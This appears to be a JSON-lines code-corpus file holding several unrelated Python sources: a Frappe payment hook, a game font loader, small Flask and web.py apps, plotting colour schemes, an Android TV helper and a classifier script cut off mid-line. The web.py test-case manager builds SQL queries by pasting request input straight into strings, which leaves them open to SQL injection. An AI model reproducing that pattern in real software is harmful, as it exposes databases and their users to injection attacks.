print('-h\\t--help: The thing you just done diddly did.')\n print('-l\\t--luminance: Enables sorting by luminance.')\n print('-c\\t--color: Enables sorting by color.')\n print('\\nNotes:')\n print('If luminance and color are both set, luminance will occur before color.')\n print('Doing so tends to produce better results.')\n\n # Sys Args\n sort_lum = False\n sort_col = False\n\n for i in range(len(sys.argv)):\n if sys.argv[i] == '-d' or sys.argv[i] == '--debug':\n print('Debug Mode')\n import better_exceptions\n\n if sys.argv[i] == '-h' or sys.argv[i] == '--help':\n print_help()\n\n if sys.argv[i] == '-l' or sys.argv[i] == '--luminance':\n print('Luminance: Enabled')\n sort_lum = True\n\n if sys.argv[i] == '-c' or sys.argv[i] == '--color':\n print('Color: Enabled')\n sort_col = True\n\n if sort_lum:\n sortLum(*getPictures())\n if sort_col:\n sortColor(*getPictures())\n\nif __name__ == '__main__':\n freeze_support()\n main()\n","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"385882395","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2020, seabridge_app and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.frappeclient import FrappeOAuth2Client,OAuth2Session\nfrom frappe.model.document import Document\nimport json\nimport requests\nfrom datetime import datetime\n\nclass PurchaseInvoice(Document):\n\tpass\n\n@frappe.whitelist()\ndef update_status(doc,method):\n if doc.payment_type==\"Pay\":\n for val in doc.references:\n if val.reference_doctype==\"Purchase Invoice\":\n if val.outstanding_amount==0: \n pi_doc=frappe.get_doc(\"Purchase Invoice\",val.reference_name) \n pi_doc.db_set('workflow_state','Paid')\n pi_doc.db_set('status','Paid')\n pi_doc.db_set('paid_date',datetime.date(datetime.now()))\n\n\ndef update_status_on_cancel(doc,method):\n if doc.payment_type==\"Pay\":\n for val in doc.references:\n if val.reference_doctype==\"Purchase Invoice\":\n if val.outstanding_amount>0:\n pi_doc=frappe.get_doc(\"Purchase Invoice\",val.reference_name) \n pi_doc.db_set('workflow_state','To Pay')\n \n\n","sub_path":"seabridge_app/seabridge_app/doctype/payment_entry/payment_entry.py","file_name":"payment_entry.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"508341978","text":"import os\nimport mmap\nimport struct\nimport array\n\nimport BSAFontElement\n\nclass BSAFont:\n '''Fonts are stored with 95 symbols, representing ASCII 33-127. The first\n 95 bytes are a count of lines used for each symbol, followed by a bunch\n of 16-bit values. Each 16-bit word is a line of one symbol, in the form\n of a bitmask indicating which pixels on that line should be colored.\n \n There is no width value encoded in the font data. This must be determined\n by scanning each line of a particular symbol, locating the last (lowest)\n bit on the line.\n \n The symbol data is loaded into the given array as 96 symbols (adding one\n for the space, so no special case is requiring to insert spaces into\n text). The lines are also stored as 16-bit values, leaving it to the\n rendering code to scan the bits and determine which ones need to be set. \n \n These are the font files found in the Arena directory:\n ARENAFNT.DAT, height = 9\n CHARFNT.DAT, height = 8\n FONT_A.DAT, height = 11\n FONT_B.DAT, height = 6\n FONT_C.DAT, height = 14\n FONT_D.DAT, height = 7\n FONT_S.DAT, height = 5\n FONT4.DAT, height = 7\n TEENYFNT.DAT, height = 8'''\n SYMBOL_NUMBER = 96\n \n def __init__(self, filename = '', font_height = 0):\n self._filename = filename\n self._font_height = font_height\n self._symbols = [BSAFontElement.BSAFontElement() \\\n for i in xrange(self.SYMBOL_NUMBER)]\n\n def __repr__(self):\n return 'BSAFont:filename=[' + self._filename + '],symbols=[' + \\\n self._symbols.__repr__() + '],font_height=[' + \\\n self._font_height.__repr__() + ']'\n \n # setters\n def set_filename(self, filename):\n self._filename = filename\n \n def set_symbols(self, symbols):\n self._symbols = symbols\n \n def set_font_height(self, font_height):\n self._font_height = font_height\n \n # getters\n def get_filename(self):\n return self._filename\n \n def get_symbols(self):\n return self._symbols\n\n def get_font_height(self):\n return self._font_height\n\n def _open(self):\n self._file = open(self._filename, 'rb')\n size = os.path.getsize(self._filename)\n #self._mmaped_file = mmap.mmap(file.fileno(), size, mmap.MAP_PRIVATE,\\\n # mmap.PROT_READ)\n\n def _close(self):\n #self._mmaped_file.close()\n self._file.close()\n \n def load(self):\n self._open()\n \n #self._mmaped_file.seek(95)\n self._file.seek(95)\n \n#===============================================================================\n# Special case for the space. There is no font symbol for it,\n# pad out a symbol for it based upon the font size.\n#===============================================================================\n \n self._symbols[0].set_width(4)\n self._symbols[0].set_height(self._font_height)\n \n for i in xrange(1, self.SYMBOL_NUMBER):\n self._symbols[i].set_height(self._font_height)\n \n width = 0\n \n line_num = 0\n while line_num < self._symbols[i].get_height():\n line = self._file.read(2)\n \n self._symbols[i].add_line(line)\n \n#===============================================================================\n# Scan through this line of data to determine how many pixels\n# are required to draw it. If this line is longer than any\n# others, update the width of the symbol. Once done, we know\n# exactly how many pixels to render for this symbol, which\n# also is useful when computing the length of a full line of\n# text.\n#===============================================================================\n mask = 0x8000\n \n for k in xrange(16):\n tmp_lines = self._symbols[i].get_lines()\n \n #tmp = array.array('h', tmp_lines[line_num])\n line = struct.unpack('H', tmp_lines[line_num])[0]\n if (line & mask) != 0:\n if width < (k + 1):\n width = k + 1\n \n mask = mask >> 1\n #- Pad out the width an extra pixel for inter-character spacing.\n width += 1\n \n self._symbols[i].set_width(width)\n line_num += 1\n \n self._close()\n ","sub_path":"DataExtraction/BSAFont.py","file_name":"BSAFont.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"527027045","text":"from flask import Flask, render_template, request\nimport hackbright_app\n\napp = Flask(__name__)\n\n# @app.route(\"/\")\n# def get_github():\n# return render_template(\"get_github.html\")\n\n@app.route(\"/student\")\ndef get_student():\n hackbright_app.connect_to_db()\n student_github = request.args.get(\"github\")\n row = hackbright_app.get_student_by_github(student_github)\n grades_str = hackbright_app.get_all_grades(row[2])\n\n\n html = render_template(\"student_info.html\", first_name=row[0],\n last_name=row[1],\n github=row[2], \n grades = grades_str)\n return html\n\n@app.route(\"/newstudent\")\ndef make_student():\n hackbright_app.connect_to_db()\n student_first_name = request.args.get(\"first_name\")\n student_last_name = request.args.get(\"last_name\")\n student_github = request.args.get(\"github\")\n \n hackbright_app.make_new_student(student_first_name, student_last_name, student_github)\n row = hackbright_app.get_student_by_github(student_github)\n\n html = render_template(\"student_info.html\", first_name=row[0],\n last_name=row[1],\n github=row[2])\n return html\n\n@app.route(\"/project\")\ndef get_project(): \n hackbright_app.connect_to_db()\n project_title = request.args.get(\"project_title\")\n row = hackbright_app.get_project_title(project_title)\n\n html = render_template(\"project_info.html\", project=row)\n\n return html\n\n@app.route(\"/newproject\")\ndef make_project():\n hackbright_app.connect_to_db()\n title = request.args.get(\"title\")\n description = request.args.get(\"description\")\n max_grade = request.args.get(\"max_grade\")\n hackbright_app.make_new_project(title, max_grade, description)\n\n row = hackbright_app.get_project_info(title)\n html = render_template(\"project_info.html\", project=row)\n\n return html\n\n\n\n@app.route(\"/\")\ndef new_project():\n return render_template(\"new_project.html\")\n\n# @app.route(\"/\")\n# def new_student():\n# return render_template(\"new_student.html\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"140910178","text":"\n#############################################################\n# pippi: parse it, plot it\n# ------------------------\n# Colour scheme module for pippi. Add your own at the end of\n# this file.\n#\n# Author: Pat Scott (patscott@physics.mcgill.ca)\n# Originally developed: March 2012\n#############################################################\n\nimport re\nimport copy\n\npermittedSchemes = {}\n\ndef Blockshading(colour,line_code, fill_code):\n scheme = colourScheme('Blockshading_'+colour)\n scheme.baseProfColourMap = '#fff--#fff(contour1)--#'+fill_code+'(contour1)--#'+fill_code\n scheme.basePostColourMap = '#fff--#fff(contour1)--#'+fill_code+'(contour1)--#'+fill_code\n scheme.mainPostContourColour2D = '\\'#'+line_code+'\\''\n scheme.mainProfContourColour2D = '\\'#'+line_code+'\\''\n scheme.mainBestFitColour1D = '#'+line_code\n scheme.mainPostMeanColour1D = '#'+line_code\n scheme.mainBestFitColour2D = '#'+line_code\n scheme.mainPostMeanColour2D = '#'+line_code\n scheme.fillTransparency2D = '0.85' #so far this is not actually functional in ctioga2; presumably it will work in later versions.\n return scheme\n\n\nclass colourScheme:\n # Class for pippi plotting colour schemes\n\n # Name of colour scheme\n name = ''\n\n # Default values for colours\n mainPostColour1D = 'Blue'\n mainProfColour1D = 'Red'\n mainPostContourColour2D = 'Black'\n mainProfContourColour2D = 'Black'\n comparisonPostColour1D = 'Grey'\n comparisonProfColour1D = 'Grey'\n comparisonPostContourColour2D = 'Grey'\n comparisonProfContourColour2D = 'Grey'\n baseProfColourMap = '#fff--#fff(contour2)--#f45(contour1)--#612'\n basePostColourMap = '#fff--#fff(contour2)--#88f(contour1)--#229'\n\n # Default values for 1D plotting styles\n fillTransparency1D = '0.85'\n main1DLineStyle = 'Solid'\n comparison1DLineStyle = 'Solid' #alt: 'Dots', 'Dashes'\n lineWidth1D = '0.9'\n\n # Default values for 2D contour plotting styles\n fillTransparency2D = '1.0'\n mainContourStyle = 'Solid'\n comparisonContourStyle = 'Solid'\n lineWidth2D = '0.9'\n\n # Default text and axis colours\n legendTextColour1D = 'Black'\n keyTextColour1D = 'Black'\n axisColour1D = 'Black'\n legendTextColour2D = 'Black'\n keyTextColour2D = 'Black'\n axisColour2D = 'Black'\n\n # Default markers and their colours\n referenceMarkerInner = 'Cross'\n referenceMarkerInnerScale = 0.7\n referenceMarkerInnerColour = 'Black'\n referenceMarkerOuter = 'Times'\n referenceMarkerOuterScale = 0.7\n referenceMarkerOuterColour = 'Yellow'\n\n mainBestFitMarker = 'Star'\n mainBestFitMarkerScale = 0.8\n mainBestFitColour1D = '#300'\n mainBestFitColour2D = '#300'\n mainBestFitColourOutline2D = 'Black'\n\n mainPostMeanMarker = 'Bullet'\n mainPostMeanMarkerScale = 0.6\n mainPostMeanColour1D = '#004'\n mainPostMeanColour2D = '#004'\n mainPostMeanColourOutline2D = 'Black'\n\n comparisonBestFitMarker = 'Star'\n comparisonBestFitMarkerScale = 0.8\n comparisonBestFitColour = 'Grey'\n\n comparisonPostMeanMarker = 'Bullet'\n comparisonPostMeanMarkerScale = 0.6\n comparisonPostMeanColour = 'Grey'\n\n def __init__(self,name):\n global permittedSchemes\n name = name.lower()\n self.name = name\n if permittedSchemes is None:\n permittedSchemes = {name:self}\n else:\n permittedSchemes[name] = self\n\n def colourMap(self,contours,kind):\n #Construct colourmap from base colour map and contour levels\n if kind == 'post':\n localColourMap = self.basePostColourMap\n elif kind == 'like':\n localColourMap = self.baseProfColourMap\n elif kind == 'obs':\n localColourMap = self.baseObsColourMap\n else:\n sys.exit(' Error: unrecognised type of colourmap requested.\\n Quitting...\\n')\n for i, contour in enumerate(contours):\n localColourMap = re.sub(r'contour'+str(i+1), contour, localColourMap)\n return localColourMap\n\n# basic colour scheme\nbasic = colourScheme('basic')\n\n# iceCube colour scheme\niceCube = colourScheme('iceCube')\niceCube.baseProfColourMap = '#fff--#fff(contour2)--#292(contour1)--#f55(contour1)--#000'\niceCube.basePostColourMap = '#fff--#fff(contour2)--#29d(contour1)--#f55(contour1)--#000'\niceCube.baseObsColourMap = 'hls:White(contour1)--Red(contour2)--Green(contour3)'\niceCube.mainBestFitColour1D = 'Black'\niceCube.mainPostMeanColour1D = 'Black'\niceCube.mainBestFitColour2D = 'Black'\niceCube.mainPostMeanColour2D = 'Black'\n\n# iceCube79 colour scheme\niceCube79 = colourScheme('iceCube79')\niceCube79.baseProfColourMap = '#fff--#fff(contour2)--#fab(contour1)--#f45'\niceCube79.basePostColourMap = '#fff--#fff(contour2)--#ddf(contour1)--#88f'\niceCube79.baseObsColourMap = 'hls:White(contour1)--Red(contour2)--Green(contour3)'\niceCube79.mainBestFitColour1D = 'Black'\niceCube79.mainPostMeanColour1D = 'Black'\niceCube79.mainBestFitColour2D = 'Black'\niceCube79.mainPostMeanColour2D = 'Black'\niceCube79.mainPostContourColour2D = 'Grey'\niceCube79.mainProfContourColour2D = 'Grey'\niceCube79.lineWidth2D = '1.5'\n\n# iceCube3sig colour scheme\niceCube3sig = colourScheme('iceCube3sig')\niceCube3sig.baseProfColourMap = '#fff--#fff(contour3)--#292(contour2)--#fff(contour2)--#929(contour1)--#f55(contour1)--#000'\niceCube3sig.basePostColourMap = '#fff--#fff(contour3)--#29d(contour2)--#fff(contour2)--#929(contour1)--#f55(contour1)--#000'\niceCube3sig.baseObsColourMap = 'hls:White(contour1)--Red(contour2)--Green(contour3)'\niceCube3sig.mainBestFitColour1D = 'Black'\niceCube3sig.mainPostMeanColour1D = 'Black'\niceCube3sig.mainBestFitColour2D = 'Black'\niceCube3sig.mainPostMeanColour2D = 'Black'\n\n# SBClassic colour scheme\nSBClassic = colourScheme('SBClassic')\nSBClassic.baseProfColourMap = '#fff--#fff(contour2)--#2f2(contour1)--#f33(0.5)--#000'\nSBClassic.basePostColourMap = '#fff--#fff(contour2)--#95d(contour1)--#f33(0.5)--#000'\nSBClassic.baseObsColourMap = 'hls:White(contour1)--Red(contour2)--Green(contour3)'\nSBClassic.mainBestFitColour1D = 'Black'\nSBClassic.mainPostMeanColour1D = 'Black'\nSBClassic.mainBestFitColour2D = 'Black'\nSBClassic.mainPostMeanColour2D = 'Black'\n\n# BlueGold colour scheme\nBlueGold = colourScheme('BlueGold')\nBlueGold.baseProfColourMap = '#fff--#fff(contour2)--#f44(contour2)--#f44(contour1)--#ece(contour1)--#ece'\nBlueGold.basePostColourMap = '#fff--#fff(contour2)--#44f(contour2)--#44f(contour1)--#fc0(contour1)--#fc0'\nBlueGold.baseObsColourMap = 'hls:White(contour1)--Red(contour2)--Green(contour3)'\nBlueGold.mainPostContourColour2D = 'DarkBlue'\nBlueGold.mainProfContourColour2D = 'Maroon'\nBlueGold.mainBestFitColour = 'Black'\nBlueGold.mainBestFitColour1D = 'Black'\nBlueGold.mainPostMeanColour1D = 'Black'\nBlueGold.mainBestFitColour2D = 'Black'\nBlueGold.mainPostMeanColour2D = 'Black'\n\n# nightOfTheAllanachs colour scheme\nnightOfTheAllanachs = colourScheme('nightOfTheAllanachs')\nnightOfTheAllanachs.basePostColourMap = '#000--#000(contour2)--#808(contour1)--#f33(0.5)--#ff0'\nnightOfTheAllanachs.baseProfColourMap = '#000--#000(contour2)--#33f(contour1)--#0ff(0.5)--#ff0'\nnightOfTheAllanachs.baseObsColourMap = 'Black(contour1)--Red(contour2)--Green(contour3)'\nnightOfTheAllanachs.mainPostContourColour2D = 'White'\nnightOfTheAllanachs.mainProfContourColour2D = 'White'\nnightOfTheAllanachs.axisColour2D = 'White'\nnightOfTheAllanachs.mainBestFitColour1D = 'Black'\nnightOfTheAllanachs.mainPostMeanColour1D = 'Black'\nnightOfTheAllanachs.mainBestFitColour2D = 'White'\nnightOfTheAllanachs.mainPostMeanColour2D = 'White'\nnightOfTheAllanachs.legendTextColour2D = 'White'\nnightOfTheAllanachs.keyTextColour2D = 'White'\nnightOfTheAllanachs.comparisonContourStyle = 'Dashes'\nnightOfTheAllanachs.comparison1DLineStyle = 'Dashes'\n\n# nightOfTheAllanachs2 colour scheme\nnightOfTheAllanachs2 = colourScheme('nightOfTheAllanachs2')\nnightOfTheAllanachs2.basePostColourMap = '#000--#000(contour2)--#808(contour1)--#f33(0.5)--#ff0'\nnightOfTheAllanachs2.baseProfColourMap = '#000--#000(contour2)--#33f(contour1)--#0ff(0.5)--#ff0'\nnightOfTheAllanachs2.baseObsColourMap = 'Black(contour1)--Red(contour2)--#00FFFF(contour3)'\nnightOfTheAllanachs2.mainPostContourColour2D = 'White'\nnightOfTheAllanachs2.mainProfContourColour2D = 'White'\nnightOfTheAllanachs2.axisColour2D = 'White'\nnightOfTheAllanachs2.mainBestFitColour1D = 'Red'\nnightOfTheAllanachs2.mainPostMeanColour1D = 'Blue'\nnightOfTheAllanachs2.mainBestFitColour2D = 'White'\nnightOfTheAllanachs2.mainBestFitColourOutline2D = 'Black'\nnightOfTheAllanachs2.mainPostMeanColour2D = 'White'\nnightOfTheAllanachs2.mainPostMeanColourOutline2D = 'Black'\nnightOfTheAllanachs2.legendTextColour2D = 'White'\nnightOfTheAllanachs2.keyTextColour2D = 'White'\nnightOfTheAllanachs2.comparisonContourStyle = 'Dashes'\nnightOfTheAllanachs2.comparison1DLineStyle = 'Dashes'\n\n# nightOfTheAllanachs3 colour scheme\nnightOfTheAllanachs3 = colourScheme('nightOfTheAllanachs3')\nnightOfTheAllanachs3.basePostColourMap = '#000--#000(contour2)--#808(contour1)--#f33(0.5)--#ff0'\nnightOfTheAllanachs3.baseProfColourMap = '#000--#000(contour2)--#33f(contour1)--#0ff(0.5)--#ff0'\nnightOfTheAllanachs3.baseObsColourMap = 'Black(contour1)--Blue(contour2)--Orange(contour3)'\nnightOfTheAllanachs3.mainPostContourColour2D = 'White'\nnightOfTheAllanachs3.mainProfContourColour2D = 'White'\nnightOfTheAllanachs3.axisColour2D = 'White'\nnightOfTheAllanachs3.mainBestFitColour1D = 'Red'\nnightOfTheAllanachs3.mainPostMeanColour1D = 'Blue'\nnightOfTheAllanachs3.mainBestFitColour2D = 'White'\nnightOfTheAllanachs3.mainBestFitColourOutline2D = 'Black'\nnightOfTheAllanachs3.mainPostMeanColour2D = 'White'\nnightOfTheAllanachs3.mainPostMeanColourOutline2D = 'Black'\nnightOfTheAllanachs3.legendTextColour2D = 'White'\nnightOfTheAllanachs3.keyTextColour2D = 'White'\nnightOfTheAllanachs3.comparisonContourStyle = 'Dashes'\nnightOfTheAllanachs3.comparison1DLineStyle = 'Dashes'\n\n# Blockshading colour schemes\nBlockshading_red = Blockshading(\"red\", \"800\", \"e00\")\nBlockshading_green = Blockshading(\"green\", \"080\", \"0e0\")\nBlockshading_blue = Blockshading(\"blue\", \"005\", \"44f\")\nBlockshading_pink = Blockshading(\"pink\", \"808\", \"e0e\")\nBlockshading_purple = Blockshading(\"purple\", \"303\", \"80e\")\nBlockshading_orange = Blockshading(\"orange\", \"840\", \"f90\")\nBlockshading_yellow = Blockshading(\"yellow\", \"870\", \"fe0\")\nBlockshading_cyan = Blockshading(\"cyan\", \"088\", \"3ee\")\n","sub_path":"pippi_colours.py","file_name":"pippi_colours.py","file_ext":"py","file_size_in_byte":10123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"473985097","text":"import web\nfrom web import form\nfrom config import *\nfrom myutils import *\n\nrender = web.template.render('./templates/', base='layout', cache=False)\n\nurls = (\n '/new', 'add_new_case_group',\n '/edit/(.*)', 'edit_case_group',\n '/assign/(.*)', 'assign_case_group',\n '(.*)', 'view_all_case_group',\n)\n\nv_name = form.regexp(r\".{1,50}$\", 'must fill in this field')\n\ndef get_form(cn='', s=True):\n add_case_group_form = form.Form(\n form.Textbox(\"name\", v_name, description=\"Test case group name: \", size=\"50\", value=cn),\n form.Checkbox(\"status\", description=\"Active? \", size=\"50\", value='ACTIVE', checked=s)\n )\n return add_case_group_form\n\nclass add_new_case_group:\n def GET(self):\n f = get_form()\n return render.case_group_add(f, 'Add')\n\n def POST(self):\n f = get_form()\n if not f.validates():\n return render.case_add(f, 'Add')\n else:\n f_status = web.input().has_key('status') and web.input().status or 'IN_ACTIVE'\n sql_stmt = '''INSERT INTO test_case_group(name, status)\n VALUES\n (\"%s\", \"%s\" );''' % (web.input().name, f_status)\n try:\n DB.query(sql_stmt)\n except:\n return render.error_add_case_group(web.input())\n return render.add_case_group_success(web.input(), 'added')\n \nclass view_all_case_group:\n def GET(self, name):\n sql_stmt = BASE_GET_TEST_CASE_GROUP_STMT + ' HAVING tcg.id > 0'\n result = myutils.map_query(sql_stmt)\n return render.case_group_all(result)\n\nclass edit_case_group:\n def GET(self, name):\n sql_stmt = BASE_GET_TEST_CASE_GROUP_STMT + ' HAVING tcg.id = %s' % name\n result = myutils.map_query(sql_stmt)[0]\n f_status = result.status == 'ACTIVE' and True or False\n f = get_form(result.name, f_status)\n return render.case_group_add(f, 'edit')\n\n def POST(self, name):\n update_status = web.input().has_key('status') and web.input().status or 'IN_ACTIVE'\n sql_stmt = 'UPDATE test_case_group SET name = \"%s\", status= \"%s\" WHERE id = %s;' % (web.input().name, update_status, name)\n try:\n DB.query(sql_stmt)\n except:\n return render.error_add_case_group(web.input())\n return render.add_case_group_success(web.input(), 'edited')\n\nclass assign_case_group:\n def GET(self, id):\n page_num = int(web.input().has_key('page') and web.input().page or '1')\n page_size = PAGE_SIZE\n sql_statement = BASE_GET_CASE_INFO_STMT\n sql_condition = []\n para_dict = {}\n para = ''\n if web.input().has_key('kw') and len(str(web.input()['kw'])) > 0:\n sql_condition.append(\" tc.name LIKE '%\" + str(web.input().kw) + \"%' \")\n para_dict['kw'] = str(web.input().kw)\n if web.input().has_key('desc') and len(str(web.input()['desc'])) > 0:\n sql_condition.append(\" tc.description LIKE '%\" + str(web.input().desc) + \"%' \")\n para_dict['desc'] = str(web.input().desc)\n\n sql_condition_stmt = ''\n for i in range(len(sql_condition)):\n if i > 0 and i < len(sql_condition):\n sql_condition_stmt += ' OR ' + sql_condition[i]\n else:\n sql_condition_stmt += sql_condition[i]\n if len(sql_condition_stmt) > 0:\n sql_condition_stmt = ' WHERE ' + sql_condition_stmt\n\n sql_statement += sql_condition_stmt\n for k,v in para_dict.iteritems():\n para += '&%s=%s' % (k, v)\n \n count_stmt = sql_statement \n sql_statement += ' LIMIT %s, %s' % ((int(page_num) - 1)*page_size, page_size)\n result = myutils.map_query(sql_statement)\n # filter duplicate rows, concat test case group\n d_result = myutils.de_duplicate_result(result)\n total_page = len(DB.query(count_stmt))/page_size + 1\n case_group_name = DB.query('''SELECT name FROM test_case_group WHERE id = %s''' % id)[0]['name'];\n return render.case_group_assign(d_result, total_page, page_num, page_size, 5, case_group_name, id, para)\n\ncase_group_manager_web = web.application(urls, locals())\n\n","sub_path":"case_group_manager.py","file_name":"case_group_manager.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"414042573","text":"\"\"\"Connect to a device and determine whether it's an Android TV or an Amazon Fire TV.\n\nADB Debugging must be enabled.\n\"\"\"\n\nfrom .androidtv import AndroidTV\nfrom .basetv import BaseTV\nfrom .firetv import FireTV\n\n\ndef setup(host, adbkey='', adb_server_ip='', adb_server_port=5037, device_class='auto'):\n \"\"\"Connect to a device and determine whether it's an Android TV or an Amazon Fire TV.\n\n Parameters\n ----------\n host : str\n The address of the device in the format ``:``\n adbkey : str\n The path to the ``adbkey`` file for ADB authentication; the file ``adbkey.pub`` must be in the same directory\n adb_server_ip : str\n The IP address of the ADB server\n adb_server_port : int\n The port for the ADB server\n device_class : str\n The type of device: ``'auto'`` (detect whether it is an Android TV or Fire TV device), ``'androidtv'``, or ``'firetv'```\n\n Returns\n -------\n aftv : AndroidTV, FireTV\n The representation of the device\n\n \"\"\"\n if device_class == 'androidtv':\n return AndroidTV(host, adbkey, adb_server_ip, adb_server_port)\n\n if device_class == 'firetv':\n return FireTV(host, adbkey, adb_server_ip, adb_server_port)\n\n if device_class != 'auto':\n raise ValueError(\"`device_class` must be 'androidtv', 'firetv', or 'auto'.\")\n\n aftv = BaseTV(host, adbkey, adb_server_ip, adb_server_port)\n\n # Fire TV\n if aftv.device_properties.get('manufacturer') == 'Amazon':\n aftv.__class__ = FireTV\n\n # Android TV\n else:\n aftv.__class__ = AndroidTV\n\n return aftv\n","sub_path":"androidtv/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"170895435","text":"depósito_inicial = float(input(\"Qual é seu depósito inicial? Déposito Inicial: \"))\ndeposito_mensal = float(input(\"Qual vai ser seu déposito mensal? Déposito Mensal: \"))\ntaxa_de_juros = float(input(\"Qual é a taxa de juros? Taxa de Juros Mensal: \"))\n\nmês = depósito_inicial * (1 + taxa_de_juros)\n\nnumero_do_mês = 1\n\nwhile numero_do_mês <= 24:\n mês = (depósito_inicial + deposito_mensal*numero_do_mês) * (1 + taxa_de_juros) ** (numero_do_mês + 1)\n print(\"{0:.2f}\".format(mês))\n numero_do_mês = numero_do_mês + 1\n\nprint(\"{0:.2f}\".format(mês - depósito_inicial - 24*deposito_mensal))","sub_path":"backup/user_154/ch35_2019_04_12_17_19_09_212637.py","file_name":"ch35_2019_04_12_17_19_09_212637.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"336824720","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Peter Burton R00038147\n\"\"\"\n\nimport time\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import cross_validation\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn import metrics\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.grid_search import RandomizedSearchCV\nfrom sklearn import model_selection\nfrom sklearn.externals import joblib\nfrom scipy.stats import randint\nfrom nltk.stem import PorterStemmer\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk import word_tokenize\nfrom nltk.util import ngrams\nfrom nltk.corpus import stopwords\nimport matplotlib.pyplot as plt\nimport scikitplot as skplt\nimport itertools\n\n#Function to remove stop words from a string\ndef remove_stop_words(element, stop_words):\n \n word_tokens = word_tokenize(element)\n sentence = \"\"\n for w in word_tokens:\n if w not in stop_words:\n sentence += w\n \n return sentence\n\n#Function to make word grams of a given number i.e. 3\ndef word_grams(words, number):\n \n tokens = word_tokenize(words)\n ngram_list = list(ngrams(tokens, number))\n sentence = \"\"\n for word in ngram_list:\n sentence += str(word)\n \n return sentence\n\n#Function to plot ROC curve\ndef plot_roc_curve(target_test, predicted, name):\n fpr, tpr, threshold = metrics.roc_curve(target_test, predicted, pos_label='Yes')\n roc_auc = metrics.auc(fpr, tpr)\n #This is only used when obtaining raw data for the report, otherwise use the plot\n#==============================================================================\n# print(\"---------------------------\\nROC Curve\\n---------------------------\")\n# print(\"Area under the curve: \", roc_auc)\n# print(\"fpr: \", fpr)\n# print(\"tpr: \", tpr)\n# print(\"threshold: \", threshold)\n#==============================================================================\n plt.figure()\n plt.title(name + ' Receiver Operating Characteristic Curve')\n plt.plot(fpr, tpr, 'b', label = 'AUC = %0.2f' % roc_auc)\n plt.legend(loc = 'lower right')\n plt.plot([0, 1], [0, 1],'r--')\n plt.xlim([0, 1])\n plt.ylim([0, 1.05])\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.show()\n \n \n#Function to print confusion matrices to assess accuracy of classifiers\ndef plot_confusion_matrix(cm,classes,title='Confusion matrix'):\n \n plt.figure()\n plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation = 45)\n plt.yticks(tick_marks, classes)\n \n thresh = cm.max()/2.\n for i,j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, cm[i, j],horizontalalignment=\"center\",color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True Label')\n plt.xlabel('Predicted Label')\n plt.show()\n \n \ndef load_file():\n \n data = []\n target = []\n \n #read CSV into a dataframe\n df = pd.read_csv(\"../datasets/Xu_Jun_Zhu_Bellmore_data/biggest_data.csv\")\n #Check for null values and get counts\n df = df[pd.notnull(df[\"Answer.ContainCyberbullying\"])]\n print(df['Answer.ContainCyberbullying'].value_counts())\n \n yes_count = 0\n for index, row in df.iterrows():\n if row['Answer.ContainCyberbullying'] == 'Yes':\n yes_count = yes_count + 1\n \n print(yes_count)\n \n no_counter = 0\n #Down sampling to make sure set is balanced, adding data and target to respective arrays\n for index, row in df.iterrows():\n if row['Answer.ContainCyberbullying'] == 'Yes':\n data.append(row['Input.posttext'])\n target.append(row['Answer.ContainCyberbullying'])\n else:\n if no_counter < yes_count:\n data.append(row['Input.posttext'])\n target.append(row['Answer.ContainCyberbullying'])\n no_counter = no_counter + 1\n \n return data, target\n\n\ndef preprocess():\n \n # Initialise Porter Stemmer & Lemmatization\n ps = PorterStemmer()\n lem = WordNetLemmatizer()\n # Create a set to hold stopwords that we don't want from NLTK\n stop_words = set(stopwords.words('english'))\n \n # Load in the file\n data,target = load_file()\n \n #Various methods of preprocessing, comment or uncomment to get various combinations\n \n#==============================================================================\n# #Stemming using Porter Stemming Algorithm\n# data = [(' '.join(ps.stem(token) for token in word_tokenize(element))) for element in data]\n#==============================================================================\n#==============================================================================\n# #Lemmatization using WordNet Lemmatizer Algorithm\n# data = [(' '.join(lem.lemmatize(token) for token in word_tokenize(element))) for element in data]\n#==============================================================================\n#==============================================================================\n# #Make Data into N-grams\n# data = [word_grams(element, 3) for element in data]\n#==============================================================================\n#==============================================================================\n# #Stop word removal\n# data = [remove_stop_words(element, stop_words) for 